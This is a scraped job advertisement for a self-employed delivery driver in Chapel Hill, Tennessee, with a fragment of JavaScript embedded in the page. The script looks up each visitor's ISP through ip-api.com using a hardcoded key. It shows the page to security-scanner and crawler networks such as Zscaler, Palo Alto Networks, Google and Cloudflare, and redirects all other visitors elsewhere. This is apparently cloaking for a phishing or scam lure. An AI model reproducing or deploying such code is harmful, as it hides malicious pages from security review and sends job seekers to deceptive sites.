Delivery Driver – Be Your Own Boss
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Delivery Driver - Be Your Own Boss in Chapel Hill, Tennessee!
Enjoy the flexibility of managing your own schedule while earning competitive pay.
Responsibilities include:
• Delivering packages efficiently and safely to customers within your designated area.
• Navigating routes using GPS and maintaining timely deliveries.
• Providing excellent customer service and handling inquiries professionally.
• Ensuring packages are handled with care and secured properly during transit.
Skills needed:
- Reliable transportation and valid driver's license.
- Strong time management and organizational skills.
- Good communication and customer service skills.
- Ability to work independently and follow safety protocols.
Benefits include:
- Flexibility to set your own hours.
- Ability to increase earnings based on your effort.
- Supportive team environment.
- Opportunities for growth and additional incentives.